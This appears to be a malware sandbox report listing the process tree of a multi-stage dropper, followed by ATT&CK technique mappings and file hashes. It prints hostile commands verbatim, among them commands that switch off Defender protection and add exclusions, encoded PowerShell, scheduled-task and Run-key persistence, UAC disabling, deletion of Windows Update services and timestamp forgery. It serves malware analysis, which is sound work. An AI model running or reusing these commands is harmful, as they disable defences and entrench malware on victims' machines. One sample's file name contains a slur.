C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\x6389655.exe
4⤵
PID:4088

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x5084007.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\x5084007.exe
5⤵
PID:164

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f7968570.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\f7968570.exe
6⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\a\141.exe
"C:\Users\Admin\AppData\Local\Temp\a\141.exe"
3⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\a\photo430.exe
"C:\Users\Admin\AppData\Local\Temp\a\photo430.exe"
3⤵
PID:4376

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v1303716.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\v1303716.exe
4⤵
PID:5032

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v6743071.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\v6743071.exe
5⤵
PID:4224

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\a9756903.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\a9756903.exe
6⤵
PID:1884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
7⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\b9324549.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\b9324549.exe
6⤵
PID:4136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4136 -s 948
7⤵
- Program crash
PID:3544

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\c8266334.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\c8266334.exe
5⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe
"C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe"
6⤵
PID:5640

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metado.exe /TR "C:\Users\Admin\AppData\Local\Temp\a9e2a16078\metado.exe" /F
7⤵
- Creates scheduled task(s)
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "metado.exe" /P "Admin:N"&&CACLS "metado.exe" /P "Admin:R" /E&&echo Y|CACLS "..\a9e2a16078" /P "Admin:N"&&CACLS "..\a9e2a16078" /P "Admin:R" /E&&Exit
7⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:6720

C:\Windows\SysWOW64\cacls.exe
CACLS "metado.exe" /P "Admin:N"
8⤵
PID:6520

C:\Windows\SysWOW64\cacls.exe
CACLS "metado.exe" /P "Admin:R" /E
8⤵
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:6432

C:\Windows\SysWOW64\cacls.exe
CACLS "..\a9e2a16078" /P "Admin:N"
8⤵
PID:5440

C:\Windows\SysWOW64\cacls.exe
CACLS "..\a9e2a16078" /P "Admin:R" /E
8⤵
PID:1108

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\d0129463.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\d0129463.exe
4⤵
PID:4332

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
5⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
3⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
"C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
4⤵
PID:5872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3152

C:\Users\Admin\AppData\Local\Temp\a\fristname.exe
"C:\Users\Admin\AppData\Local\Temp\a\fristname.exe"
3⤵
PID:3744

C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe
"C:\Users\Admin\AppData\Local\Temp\ae3108e6c23af96b9aac776041f0203a.exe"
4⤵
PID:1000

C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe
"C:\Users\Admin\AppData\Local\Temp\BitDefendMS.exe"
4⤵
PID:4732

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
4⤵
PID:5488

C:\Users\Admin\AppData\Local\Temp\Builtt.exe
"C:\Users\Admin\AppData\Local\Temp\Builtt.exe"
5⤵
PID:5752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "net session"
6⤵
PID:5140

C:\Windows\system32\net.exe
net session
7⤵
PID:1576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
8⤵
PID:5104

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
6⤵
PID:5932

C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
7⤵
PID:4828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
6⤵
PID:5988

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
7⤵
PID:5816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
6⤵
PID:5972

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
7⤵
- Enumerates processes with tasklist
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
6⤵
PID:5928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
7⤵
PID:5620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
6⤵
PID:5908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
7⤵
PID:5628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'"
6⤵
PID:5892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Builtt.exe'
7⤵
PID:5412

C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe
"C:\Users\Admin\AppData\Local\Temp\a\IE_CACHE.exe"
3⤵
PID:3604

C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe
"C:\Users\Admin\AppData\Local\Temp\a\d9ff4ed3.exe"
3⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\a\office_lic.exe
"C:\Users\Admin\AppData\Local\Temp\a\office_lic.exe"
3⤵
PID:3964

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\office_lic.exe" & del "C:\ProgramData\*.dll"" & exit
4⤵
PID:5584

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
5⤵
- Delays execution with timeout.exe
PID:1564

C:\Users\Admin\AppData\Local\Temp\a\wall.exe
"C:\Users\Admin\AppData\Local\Temp\a\wall.exe"
3⤵
PID:5376

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
4⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"
4⤵
PID:984

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
5⤵
PID:5388

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
6⤵
- Creates scheduled task(s)
PID:6720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
6⤵
PID:6944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:6012

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
7⤵
PID:6304

C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
7⤵
PID:6928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7⤵
PID:2112

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:N"
7⤵
PID:5588

C:\Windows\SysWOW64\cacls.exe
CACLS "..\6d73a97b0c" /P "Admin:R" /E
7⤵
PID:5012

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
6⤵
PID:6864

C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
7⤵
PID:2684

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2684 -s 596
8⤵
- Program crash
PID:3392

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2684 -s 616
8⤵
- Program crash
PID:5460

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
4⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe
"C:\Users\Admin\AppData\Local\Temp\a\WWW3_64.exe"
3⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\a\gogw.exe
"C:\Users\Admin\AppData\Local\Temp\a\gogw.exe"
3⤵
PID:5796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe"
4⤵
PID:5320

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN MicrosoftEdgeUpdateTaskMachineUARun.exe /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
5⤵
- Creates scheduled task(s)
PID:3344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name CreationTime -Value \"06/13/2022 3:16 PM\""
4⤵
PID:3516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastWriteTime -Value \"06/13/2022 3:16 PM\""
4⤵
PID:6220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "Set-ItemProperty -Path \"C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe\" -Name LastAccessTime -Value \"06/13/2022 3:16 PM\""
4⤵
PID:4128

C:\Users\Admin\AppData\Local\Temp\a\trust.exe
"C:\Users\Admin\AppData\Local\Temp\a\trust.exe"
3⤵
PID:5608

C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe
"C:\Users\Admin\AppData\Local\Temp\a\aaa1.exe"
3⤵
PID:5604

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\a\netTime.exe
"C:\Users\Admin\AppData\Local\Temp\a\netTime.exe"
3⤵
PID:196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
4⤵
PID:5392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9DC8.tmp.bat""
4⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\a\1.exe
"C:\Users\Admin\AppData\Local\Temp\a\1.exe"
3⤵
PID:2660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe"
4⤵
PID:4264

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN Soft /TR C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
5⤵
- Creates scheduled task(s)
PID:4116

C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe
"C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe"
3⤵
PID:3720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\mslink1.exe" & del "C:\ProgramData\*.dll"" & exit
4⤵
PID:7120

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
5⤵
- Delays execution with timeout.exe
PID:6488

C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe
"C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe"
3⤵
PID:5000

C:\Users\Admin\AppData\Local\Temp\a\sQdXMQIHJl75b1w.exe
"{path}"
4⤵
PID:6692

C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe
"C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe"
3⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\a\Zp1TK71j2PhbPpv.exe
"{path}"
4⤵
PID:6456

C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
"C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
3⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
"C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
3⤵
PID:6508

C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe
"C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe"
3⤵
PID:7092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\a\toolspub3.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub3.exe"
3⤵
PID:7156

C:\Users\Admin\AppData\Local\Temp\a\toolspub3.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub3.exe"
4⤵
PID:4140

C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
"C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
3⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
3⤵
PID:5104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
4⤵
PID:5428

C:\Baldi\Baldi.exe
C:\Baldi\Baldi.exe
5⤵
PID:3904

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im explorer.exe
6⤵
- Kills process with taskkill
PID:6580

C:\Baldi\DisableUAC.exe
C:\Baldi\DisableUAC.exe
5⤵
PID:6304

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7546.tmp\7547.bat C:\Baldi\DisableUAC.exe"
6⤵
PID:5440

C:\Windows\system32\reg.exe
reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
7⤵
PID:1460

C:\Windows\system32\shutdown.exe
shutdown -r -t 1 -c "BALDI EVIL..."
7⤵
PID:4744

C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
3⤵
PID:3344

C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe
"C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe"
3⤵
PID:6796

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
4⤵
PID:5516

C:\Users\Admin\AppData\Local\Temp\a\a02.exe
"C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
3⤵
PID:6740

C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
4⤵
PID:2424

C:\Users\Admin\AppData\Local\Temp\a\ss49.exe
"C:\Users\Admin\AppData\Local\Temp\a\ss49.exe"
3⤵
PID:6816

C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe
"C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe"
3⤵
PID:3788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcgBxACMAPgA="
4⤵
PID:1068

C:\Users\Admin\AppData\Roaming\nig_guy1.exe
"C:\Users\Admin\AppData\Roaming\nig_guy1.exe"
4⤵
PID:3448

C:\Users\Admin\AppData\Local\Temp\stlr.exe
"C:\Users\Admin\AppData\Local\Temp\stlr.exe"
4⤵
PID:164

C:\Users\Admin\AppData\Local\Temp\a\LummaC2_2023-05-26_18-46.exe
"C:\Users\Admin\AppData\Local\Temp\a\LummaC2_2023-05-26_18-46.exe"
3⤵
PID:5404

C:\Users\Admin\AppData\Local\Temp\a\Sniepriu.exe
"C:\Users\Admin\AppData\Local\Temp\a\Sniepriu.exe"
3⤵
PID:216

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
2⤵
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
PID:7096

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5128

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:6512

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:5152

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2572

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:6460

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6484

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:4312

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2808

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:6680

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5216

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:6044

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5404

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:6168

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:216

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4368

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:6080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
2⤵
PID:6292

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
3⤵
PID:2284

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2248

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:5868

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:6364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2420

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tasklistt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\microsoft shared\VC\tasklist.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6284

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3add855 /state1:0x41c64e6d
1⤵
PID:3420

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:6844

C:\Users\Admin\AppData\Roaming\ricegdg
C:\Users\Admin\AppData\Roaming\ricegdg
1⤵
PID:6028

C:\Users\Admin\AppData\Roaming\jhcegdg
C:\Users\Admin\AppData\Roaming\jhcegdg
1⤵
PID:3724

C:\Users\Admin\AppData\Roaming\idcegdg
C:\Users\Admin\AppData\Roaming\idcegdg
1⤵
PID:628

C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
C:\Users\Admin\AppData\Roaming\WindowsAutoUpdate.exe
1⤵
PID:5232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tasklist" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\VC\tasklist.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "tasklistt" /sc MINUTE /mo 14 /tr "'C:\Program Files\Common Files\microsoft shared\VC\tasklist.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XandETCX" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\XandETC.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XandETC" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\XandETC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XandETCX" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\de-DE\XandETC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Process Discovery

T1057

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Internet Explorer\de-DE\XandETC.exe
Filesize
957KB

MD5
e7f043a52ed8bbd9dd37bec764801f7e

SHA1
2e4da011155916140fea8839a7bb200192ba00f8

SHA256
9d2016e30d67e2799238d224adc48f6e406218c7cc9acf1c8027f3647e08c98d

SHA512
da691a958feee41f5f94bdf12730537d43829859073660a841605cc9b1c802f4af2170a3a747145a0a39b334c0cc83cfd9bedc0167e03000733a98306b4ea511

Download Submit
C:\ProgramData\CAKFIJDHJEGIDHJKKKJJ
Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

